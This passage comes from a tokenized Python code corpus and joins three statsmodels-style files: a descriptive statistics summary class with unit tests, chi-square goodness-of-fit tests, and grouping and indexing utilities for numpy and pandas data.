<EOL> assert ( number_like ( ) == True or string_like ( ) == True ) , '<STR_LIT>' + str ( self . dataset [ col ] [ <NUM_LIT:0> ] ) <EOL> def summary ( self , stats = '<STR_LIT>' , columns = '<STR_LIT:all>' , orientation = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . _arraytype == None : <EOL> self . _array_typer ( ) <EOL> if stats == '<STR_LIT>' : <EOL> stats = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif stats == '<STR_LIT:all>' : <EOL> stats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> for astat in stats : <EOL> pass <EOL> import scipy . stats <EOL> def _fun ( per ) : <EOL> return lambda x : scipy . stats . scoreatpercentile ( x , per ) <EOL> perdict = dict ( ( '<STR_LIT>' % per , [ _fun ( per ) , None , None ] ) <EOL> for per in ( <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT> , <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> if '<STR_LIT>' in stats : <EOL> self . univariate . update ( perdict ) <EOL> idx = stats . index ( '<STR_LIT>' ) <EOL> stats [ idx : idx + <NUM_LIT:1> ] = sorted ( iterkeys ( perdict ) ) <EOL> if any ( [ aitem [ <NUM_LIT:1> ] for aitem in iteritems ( self . univariate ) if aitem [ <NUM_LIT:0> ] in <EOL> stats ] ) : <EOL> if columns == '<STR_LIT:all>' : <EOL> self . _columns_list = [ ] <EOL> if self . _arraytype == '<STR_LIT>' : <EOL> self . _columns_list = self . dataset . dtype . names <EOL> else : <EOL> self . _columns_list = lrange ( self . dataset . shape [ <NUM_LIT:1> ] ) <EOL> else : <EOL> self . _columns_list = columns <EOL> if self . _arraytype == '<STR_LIT>' : <EOL> for col in self . _columns_list : <EOL> assert ( col in self . dataset . dtype . names ) <EOL> else : <EOL> assert self . _is_dtype_like ( self . dataset ) == '<STR_LIT>' <EOL> columstypes = self . dataset . dtype <EOL> for astat in stats : <EOL> calc = self . univariate [ astat ] <EOL> if self . _arraytype == '<STR_LIT>' : <EOL> calc [ <NUM_LIT:1> ] = self . _columns_list <EOL> calc [ <NUM_LIT:2> ] = [ calc [ <NUM_LIT:0> ] ( self . dataset [ col ] ) for col in <EOL> self . _columns_list if ( self . _is_dtype_like ( col ) == <EOL> '<STR_LIT>' ) ] <EOL> else : <EOL> calc [ <NUM_LIT:1> ] = [ '<STR_LIT>' + str ( col ) for col in self . _columns_list ] <EOL> calc [ <NUM_LIT:2> ] = [ calc [ <NUM_LIT:0> ] ( self . dataset [ : , col ] ) for col in <EOL> self . _columns_list ] <EOL> return self . print_summary ( stats , orientation = orientation ) <EOL> else : <EOL> return self . print_summary ( stats , orientation = orientation ) <EOL> def print_summary ( self , stats , orientation = '<STR_LIT>' ) : <EOL> title = '<STR_LIT>' <EOL> header = stats <EOL> stubs = self . univariate [ '<STR_LIT>' ] [ <NUM_LIT:1> ] <EOL> data = [ [ self . univariate [ astat ] [ <NUM_LIT:2> ] [ col ] for astat in stats ] for col in <EOL> range ( len ( self . univariate [ '<STR_LIT>' ] [ <NUM_LIT:2> ] ) ) ] <EOL> if ( orientation == '<STR_LIT>' ) or ( orientation == '<STR_LIT>' and len ( stubs ) < len ( header ) ) : <EOL> data = lmap ( lambda * row : list ( row ) , * data ) <EOL> header , stubs = stubs , header <EOL> part_fmt = dict ( data_fmts = [ "<STR_LIT>" ] * ( len ( header ) - <NUM_LIT:1> ) ) <EOL> table = SimpleTable ( data , <EOL> header , <EOL> stubs , <EOL> title = title , <EOL> txt_fmt = part_fmt ) <EOL> return table <EOL> def sign_test ( self , samp , mu0 = <NUM_LIT:0> ) : <EOL> return sign_test ( samp , mu0 ) <EOL> sign_test . __doc__ = _sign_test_doc <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> t1 = Describe ( data4 ) <EOL> noperc = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> print ( t1 . summary ( stats = noperc ) ) <EOL> print ( t1 . summary ( ) ) <EOL> print ( t1 . summary ( orientation = '<STR_LIT>' ) ) <EOL> print ( t1 . summary ( stats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , orientation = ( '<STR_LIT>' ) ) ) <EOL> print ( t1 . summary ( stats = '<STR_LIT:all>' ) ) <EOL> import unittest <EOL> data1 = np . array ( [ ( <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> , '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:4> , '<STR_LIT:b>' , '<STR_LIT>' ) ] , <EOL> dtype = [ ( '<STR_LIT>' , float ) , ( '<STR_LIT>' , int ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> data2 = np . array ( [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:4> ) ] , <EOL> dtype = [ ( '<STR_LIT>' , float ) , ( '<STR_LIT>' , float ) ] ) <EOL> data3 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:3> ] ] , dtype = float ) <EOL> data4 = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:6> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> , <NUM_LIT:9> ] ] ) <EOL> class TestSimpleTable ( unittest . TestCase ) : <EOL> def test_basic_1 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data1 ) <EOL> print ( t1 . summary ( ) ) <EOL> def test_basic_2 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t2 = Describe ( data2 ) <EOL> print ( t2 . summary ( ) ) <EOL> def test_basic_3 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data3 ) <EOL> print ( t1 . summary ( ) ) <EOL> def test_basic_4 ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data4 ) <EOL> print ( t1 . summary ( ) ) <EOL> def test_basic_1a ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data1 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT>' , columns = [ '<STR_LIT>' ] ) ) <EOL> def test_basic_1b ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t1 = Describe ( data1 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT>' , columns = '<STR_LIT:all>' ) ) <EOL> def test_basic_2a ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> t2 = Describe ( data2 ) <EOL> print ( t2 . summary ( stats = '<STR_LIT:all>' ) ) <EOL> def test_basic_3 ( aself ) : <EOL> t1 = Describe ( data3 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT:all>' ) ) <EOL> def test_basic_4a ( self ) : <EOL> t1 = Describe ( data4 ) <EOL> print ( t1 . summary ( stats = '<STR_LIT:all>' ) ) </s>
<s> """<STR_LIT>""" <EOL> from statsmodels . compat . python import itervalues <EOL> import numpy as np <EOL> from numpy . testing import assert_almost_equal , assert_equal <EOL> from statsmodels . stats . gof import ( chisquare , chisquare_power , <EOL> chisquare_effectsize ) <EOL> class Holder ( object ) : <EOL> pass <EOL> def test_chisquare_power ( ) : <EOL> from . results . results_power import pwr_chisquare <EOL> for case in itervalues ( pwr_chisquare ) : <EOL> power = chisquare_power ( case . w , case . N , case . df + <NUM_LIT:1> , <EOL> alpha = case . sig_level ) <EOL> assert_almost_equal ( power , case . power , decimal = <NUM_LIT:6> , <EOL> err_msg = repr ( vars ( case ) ) ) <EOL> def test_chisquare ( ) : <EOL> res1 = Holder ( ) <EOL> res2 = Holder ( ) <EOL> res1 . statistic = <NUM_LIT> <EOL> res1 . parameter = <NUM_LIT:4> <EOL> res1 . p_value = <NUM_LIT> <EOL> res1 . method = '<STR_LIT>' <EOL> res1 . data_name = '<STR_LIT>' <EOL> res1 . observed = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res1 . expected = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res1 . residuals = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res2 . statistic = <NUM_LIT> <EOL> res2 . parameter = <NUM_LIT:4> <EOL> res2 . p_value = <NUM_LIT> <EOL> res2 . method = '<STR_LIT>' <EOL> res2 . data_name = '<STR_LIT>' <EOL> res2 . observed = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res2 . expected = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> res2 . residuals = np . array ( [ <EOL> - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> <EOL> ] ) <EOL> freq = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pr1 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pr2 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> for pr , res in zip ( [ pr1 , pr2 ] , [ res1 , res2 ] ) : <EOL> stat , pval = chisquare ( freq , pr ) <EOL> assert_almost_equal ( stat , res . statistic , decimal = <NUM_LIT:12> ) <EOL> assert_almost_equal ( pval , res . p_value , decimal = <NUM_LIT> ) <EOL> def test_chisquare_effectsize ( ) : <EOL> pr1 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> pr2 = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> es_r = <NUM_LIT> <EOL> es1 = chisquare_effectsize ( pr1 , pr2 ) <EOL> es2 = chisquare_effectsize ( pr1 , pr2 , cohen = False ) <EOL> assert_almost_equal ( es1 , es_r , decimal = <NUM_LIT> ) <EOL> assert_almost_equal ( es2 , es_r ** <NUM_LIT:2> , decimal = <NUM_LIT> ) <EOL> res1 = chisquare_effectsize ( pr1 , pr2 , cohen = False , <EOL> correction = ( <NUM_LIT> , len ( pr1 ) - <NUM_LIT:1> ) ) <EOL> res0 = <NUM_LIT:0> <EOL> assert_equal ( res1 , res0 ) <EOL> pr3 = pr2 + [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:50> , <NUM_LIT:50> ] <EOL> res1 = chisquare_effectsize ( pr1 , pr3 , cohen = False , <EOL> correction = ( <NUM_LIT> , len ( pr1 ) - <NUM_LIT:1> ) ) <EOL> res0 = <NUM_LIT> <EOL> assert_almost_equal ( res1 , res0 , decimal = <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from statsmodels . compat . python import lrange , lzip , range <EOL> import numpy as np <EOL> import pandas as pd <EOL> from statsmodels . compat . numpy import npc_unique <EOL> import statsmodels . tools . data as data_util <EOL> from pandas . core . index import Index , MultiIndex <EOL> def combine_indices ( groups , prefix = '<STR_LIT>' , sep = '<STR_LIT:.>' , return_labels = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( groups , tuple ) : <EOL> groups = np . column_stack ( groups ) <EOL> else : <EOL> groups = np . asarray ( groups ) <EOL> dt = groups . dtype <EOL> is2d = ( groups . ndim == <NUM_LIT:2> ) <EOL> if is2d : <EOL> ncols = groups . shape [ <NUM_LIT:1> ] <EOL> if not groups . flags . c_contiguous : <EOL> groups = np . array ( groups , order = '<STR_LIT:C>' ) <EOL> groups_ = groups . view ( [ ( '<STR_LIT>' , groups . dtype ) ] * groups . shape [ <NUM_LIT:1> ] ) <EOL> else : <EOL> groups_ = groups <EOL> uni , uni_idx , uni_inv = npc_unique ( groups_ , return_index = True , <EOL> return_inverse = True ) <EOL> if is2d : <EOL> uni = uni . view ( dt ) . reshape ( - <NUM_LIT:1> , ncols ) <EOL> if return_labels : <EOL> label = [ ( prefix + sep . join ( [ '<STR_LIT:%s>' ] * len ( uni [ <NUM_LIT:0> ] ) ) ) % tuple ( ii ) <EOL> for ii in uni ] <EOL> return uni_inv , uni_idx , uni , label <EOL> else : <EOL> return uni_inv , uni_idx , uni <EOL> def group_sums ( x , group , use_bincount = True ) : <EOL> """<STR_LIT>""" <EOL> x = np . asarray ( x ) <EOL> if x . ndim == <NUM_LIT:1> : <EOL> x = x [ : , None ] <EOL> elif x . ndim > <NUM_LIT:2> and use_bincount : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if use_bincount : <EOL> if np . max ( group ) > <NUM_LIT:2> * x . shape [ <NUM_LIT:0> ] : <EOL> group = pd . factorize ( group ) [ <NUM_LIT:0> ] <EOL> return np . array ( [ np . bincount ( group , weights = x [ : , col ] ) <EOL> for col in range ( x . shape [ <NUM_LIT:1> ] ) ] ) <EOL> else : <EOL> uniques = np . unique ( group ) <EOL> result = np . zeros ( [ len ( uniques ) ] + list ( x . shape [ <NUM_LIT:1> : ] ) ) <EOL> for ii , cat in enumerate ( uniques ) : <EOL> result [ ii ] = x [ g == cat ] . sum ( <NUM_LIT:0> ) <EOL> return result <EOL> def group_sums_dummy ( x , group_dummy ) : <EOL> """<STR_LIT>""" <EOL> if data_util . _is_using_ndarray_type ( group_dummy , None ) : <EOL> return np . dot ( x . T , group_dummy ) <EOL> else : <EOL> return x . T * group_dummy <EOL> def dummy_sparse ( groups ) : <EOL> """<STR_LIT>""" <EOL> from scipy import sparse <EOL> indptr = np . arange ( len ( groups ) + <NUM_LIT:1> ) <EOL> data = np . ones ( len ( groups ) , dtype = np . int8 ) <EOL> indi = sparse . csr_matrix ( ( data , g , indptr ) ) <EOL> return indi <EOL> class Group ( object ) : <EOL> def __init__ ( self , group , name = '<STR_LIT>' ) : <EOL> self . name = name <EOL> uni , uni_idx , uni_inv = combine_indices ( group ) <EOL> self . group_int , self . uni_idx , self . uni = uni , uni_idx , uni_inv <EOL> self . n_groups = len ( self . uni ) <EOL> self . separator = '<STR_LIT:.>' <EOL> self . prefix = self . name <EOL> if self . prefix : <EOL> self . prefix = self . prefix + '<STR_LIT:=>' <EOL> def counts ( self ) : <EOL> return np . bincount ( self . group_int ) <EOL> def labels ( self ) : <EOL> prefix = self . prefix <EOL> uni = self . uni <EOL> sep = self . separator <EOL> if uni . ndim > <NUM_LIT:1> : <EOL> label = [ ( prefix + sep . join ( [ '<STR_LIT:%s>' ] * len ( uni [ <NUM_LIT:0> ] ) ) ) % tuple ( ii ) <EOL> for ii in uni ] <EOL> else : <EOL> label = [ prefix + '<STR_LIT:%s>' % ii for ii in uni ] <EOL> return label <EOL> def dummy ( self , drop_idx = None , sparse = False , dtype = int ) : <EOL> """<STR_LIT>""" <EOL> uni = self . uni <EOL> if drop_idx is not None : <EOL> idx = lrange ( len ( uni ) ) <EOL> del idx [ drop_idx ] <EOL> uni = uni [ idx ] <EOL> group = self . group <EOL> if not sparse : <EOL> return ( group [ : , None ] == uni [ None , : ] ) . astype ( dtype ) <EOL> else : <EOL> return dummy_sparse ( self . group_int ) <EOL> def interaction ( self , other ) : <EOL> if isinstance ( other , self . __class__ ) : <EOL> other = other . group <EOL> return self . __class__ ( ( self , other ) ) <EOL> def group_sums ( self , x , use_bincount = True ) : <EOL> return group_sums ( x , self . group_int , use_bincount = use_bincount ) <EOL> def group_demean ( self , x , use_bincount = True ) : <EOL> nobs = float ( len ( x ) ) <EOL> means_g = group_sums ( x / nobs , self . group_int , <EOL> use_bincount = use_bincount ) <EOL> x_demeaned = x - means_g [ self . group_int ] <EOL> return x_demeaned , means_g <EOL> class GroupSorted ( Group ) : <EOL> def __init__ ( self , group , name = '<STR_LIT>' ) : <EOL> super ( self . __class__ , self ) . __init__ ( group , name = name ) <EOL> idx = ( np . nonzero ( np . diff ( group ) ) [ <NUM_LIT:0> ] + <NUM_LIT:1> ) . tolist ( ) <EOL> self . groupidx = lzip ( [ <NUM_LIT:0> ] + idx , idx + [ len ( group ) ] ) <EOL> def group_iter ( self ) : <EOL> for low , upp in self . groupidx : <EOL> yield slice ( low , upp ) <EOL> def lag_indices ( self , lag ) : <EOL> """<STR_LIT>""" <EOL> lag_idx = np . asarray ( self . groupidx ) [ : , <NUM_LIT:1> ] - lag <EOL> mask_ok = ( lag <= lag_idx ) <EOL> return lag_idx [ mask_ok ] <EOL> def _is_hierarchical ( x ) : <EOL> """<STR_LIT>""" <EOL> item = x [ <NUM_LIT:0> ] <EOL> if isinstance ( item , ( list , tuple , np . ndarray , pd . Series , pd . DataFrame ) ) : <EOL> return True <EOL> else : <EOL> return False <EOL> def _make_hierarchical_index ( index , names ) : <EOL> return MultiIndex . from_tuples ( * [ index ] , names = names ) <EOL> def _make_generic_names ( index ) : <EOL> n_names = len ( index . names ) <EOL> pad = str ( len ( str ( n_names ) ) ) <EOL> return [ ( "<STR_LIT>" + pad + "<STR_LIT:}>" ) . format ( i ) for i in range ( n_names ) ] <EOL> class Grouping ( object ) : <EOL> def __init__ ( self , index , names = None ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( index , ( Index , MultiIndex ) ) : <EOL> if names is not None : <EOL> if hasattr ( index , '<STR_LIT>' ) : <EOL> index . set_names ( names , inplace = True ) <EOL> else : <EOL> index . names = names <EOL> self . index = index <EOL> else : <EOL> if _is_hierarchical ( index ) : <EOL> self . index = _make_hierarchical_index ( index , names ) <EOL> else : <EOL> self . index = Index ( index , name = names ) <EOL> if names is None : <EOL> names = _make_generic_names ( self . index ) <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> self . index . set_names ( names , inplace = True ) <EOL> else : <EOL> self . index . names = names <EOL> self . nobs = len ( self . index ) <EOL> self . nlevels = len ( self . index . names ) <EOL> self . slices = None <EOL> @ property <EOL> def index_shape ( self ) : <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> return self . index . levshape <EOL> else : <EOL> return self . index . shape <EOL> @ property <EOL> def levels ( self ) : <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> return self . index . levels <EOL> else : <EOL> return pd . Categorical ( self . index ) . levels <EOL> @ property <EOL> def labels ( self ) : <EOL> if hasattr ( self . index , '<STR_LIT>' ) : <EOL> return self . index . labels <EOL> else : <EOL> tmp = pd . Categorical ( self . index ) <EOL> try : <EOL> labl = tmp . codes <EOL> except AttributeError : <EOL> labl = tmp . labels <EOL> return labl [ None ] <EOL> @ property <EOL> def group_names ( self ) : <EOL> return self . index . names <EOL> def reindex ( self , index = None , names = None ) : <EOL> """<STR_LIT>""" <EOL> if names is None : <EOL> names = self . group_names <EOL> self = Grouping ( index , names ) <EOL> def get_slices ( self , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> groups = self . index . get_level_values ( level ) . unique ( ) <EOL> groups . sort ( ) <EOL> if isinstance ( self . index , MultiIndex ) : <EOL> self . slices = [ self . index . get_loc_level ( x , level = level ) [ <NUM_LIT:0> ] <EOL> for x in groups ] <EOL> else : <EOL> self . slices = [ self . index . get_loc ( x ) for x in groups ] <EOL> def count_categories ( self , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . counts = np . bincount ( self . labels [ level ] ) <EOL> def check_index ( self , is_sorted = True , unique = True , index = None ) : <EOL> """<STR_LIT>""" <EOL> if not index : <EOL> index = self . index <EOL> if is_sorted : <EOL> test = pd . DataFrame ( lrange ( len ( index ) ) , index = index ) <EOL> test_sorted = test . sort ( ) <EOL> if not test . index . equals ( test_sorted . index ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> if unique : <EOL> if len ( index ) != len ( index . unique ( ) ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> def sort ( self , data , index = None ) : <EOL> """<STR_LIT>""" <EOL> if index is None : <EOL> index = self . index <EOL> if data_util . _is_using_ndarray_type ( data , None ) : <EOL> if data . ndim == <NUM_LIT:1> : <EOL> out = pd . Series ( data , index = index , copy = True ) <EOL> out = out . sort_index ( ) <EOL> else : <EOL> out = pd . DataFrame ( data , index = index ) <EOL> out = out . sort ( inplace = False ) <EOL> return np . array ( out ) , out . index <EOL> elif data_util . _is_using_pandas ( data , None ) : <EOL> out = data <EOL> out = out . reindex ( index ) <EOL> out = out . sort_index ( ) <EOL> return out , out . index <EOL> else : <EOL> msg = '<STR_LIT>' <EOL> raise ValueError ( msg ) <EOL> def transform_dataframe ( self , dataframe , function , level = <NUM_LIT:0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if dataframe . shape [ <NUM_LIT:0> ] != self . nobs : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> out = dataframe . groupby ( level = level ) . apply ( function , ** kwargs ) <EOL> if <NUM_LIT:1> in out . shape : <EOL> return np . ravel ( out ) <EOL> else : <EOL> return np . array ( out ) <EOL> def transform_array ( self , array , function , level = <NUM_LIT:0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if array . shape [ <NUM_LIT:0> ] != self . nobs : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> dataframe = pd . DataFrame ( array , index = self . index ) <EOL> return self . transform_dataframe ( dataframe , function , level = level , <EOL> ** kwargs ) <EOL> def transform_slices ( self , array , function , level = <NUM_LIT:0> , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> array = np . asarray ( array ) <EOL> if array . shape [ <NUM_LIT:0> ] != self . nobs : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . get_slices ( level = level ) <EOL> processed = [ ] <EOL> for s in self . slices : <EOL> if array . ndim == <NUM_LIT:2> : <EOL> subset = array [ s , : ] <EOL> elif array . ndim == <NUM_LIT:1> : <EOL> subset = array [ s ] <EOL> processed . append ( function ( subset , s , ** kwargs ) ) <EOL> processed = np . array ( processed ) <EOL> return processed . reshape ( - <NUM_LIT:1> , processed . shape [ - <NUM_LIT:1> ] ) <EOL> def dummies_time ( self ) : <EOL> self . dummy_sparse ( level = <NUM_LIT:1> ) <EOL> return self . _dummies <EOL> def dummies_groups ( self , level = <NUM_LIT:0> ) : <EOL> self . dummy_sparse ( level = level ) <EOL> return self . _dummies <EOL> def dummy_sparse ( self , level = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> from scipy import sparse <EOL> groups = self . labels [ level ] <EOL> indptr = np . arange ( len ( groups ) + <NUM_LIT:1> ) <EOL> data = np . ones ( len ( groups ) , dtype = np . int8 ) <EOL> self . _dummies = sparse . csr_matrix ( ( data , groups , indptr ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from numpy . testing import assert_equal <EOL> np . random . seed ( <NUM_LIT> ) <EOL> groups = np . random . randint ( <NUM_LIT:0> , <NUM_LIT:2> , size = ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> uv , ux , u , label = combine_indices ( groups , return_labels = True ) <EOL> uv , ux , u , label = combine_indices ( groups , prefix = '<STR_LIT>' , sep = '<STR_LIT:U+002C>' , <EOL> return_labels = True ) <EOL> group0 = np . array ( [ '<STR_LIT>' , '<STR_LIT>' ] ) [ groups [ : , <NUM_LIT:0> ] ] <EOL> group1 = np . array ( [ '<STR_LIT>' , '<STR_LIT>' ] ) [ groups [ : , <NUM_LIT:1> ] ] <EOL> uv , ux , u , label = combine_indices ( ( group0 , group1 ) , <EOL> prefix = '<STR_LIT>' , <EOL> sep = '<STR_LIT:U+002C>' , <EOL> return_labels = True ) <EOL> uv , ux , u , label = combine_indices ( ( group0 , group1 ) , prefix = '<STR_LIT>' , sep = '<STR_LIT:.>' , <EOL> return_labels = True ) <EOL> group_joint = np . array ( label ) [ uv ] <EOL> group_joint_expected = np . array ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> dtype = '<STR_LIT>' ) <EOL> assert_equal ( group_joint , group_joint_expected ) <EOL> """<STR_LIT>""" <EOL> from scipy import sparse <EOL> g = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ] ) <EOL> u = lrange ( <NUM_LIT:3> ) <EOL> indptr = np . arange ( len ( g ) + <NUM_LIT:1> ) <EOL> data = np . ones ( len ( g ) , dtype = np . int8 ) <EOL> a = sparse . csr_matrix ( ( data , g , indptr ) ) <EOL> print ( a . todense ( ) ) <EOL> print ( np . all ( a . todense ( ) == ( g [ : , None ] == np . arange ( <NUM_LIT:3> ) ) . astype ( int ) ) ) <EOL> x = np . arange ( len ( g ) * <NUM_LIT:3> ) . reshape ( len ( g ) , <NUM_LIT:3> , order = '<STR_LIT:F>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( x . T * a ) <EOL> print ( np . dot ( x . T , g [ : , None ] == np . arange ( <NUM_LIT:3> ) ) ) <EOL> print ( np . array ( [ np . bincount ( g , weights = x [ : , col ] ) for col in range ( <NUM_LIT:3> ) ] ) ) <EOL> for cat in u : <EOL> print ( x [ g == cat ] . sum ( <NUM_LIT:0> ) ) <EOL> for cat in u : <EOL> x [ g == cat ] . sum ( <NUM_LIT:0> ) <EOL> cc = sparse . csr_matrix ( [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> print ( group_sums ( np . arange ( len ( g ) * <NUM_LIT:3> * <NUM_LIT:2> ) . reshape ( len ( g ) , <NUM_LIT:3> , <NUM_LIT:2> ) , g , <EOL> use_bincount = False ) . T ) <EOL> print ( group_sums ( np . arange ( len ( g ) * <NUM_LIT:3> * <NUM_LIT:2> ) . reshape ( len ( g ) , <NUM_LIT:3> , <NUM_LIT:2> ) [ : , : , <NUM_LIT:0> ] , g ) ) <EOL> print ( group_sums ( np . arange ( len ( g ) * 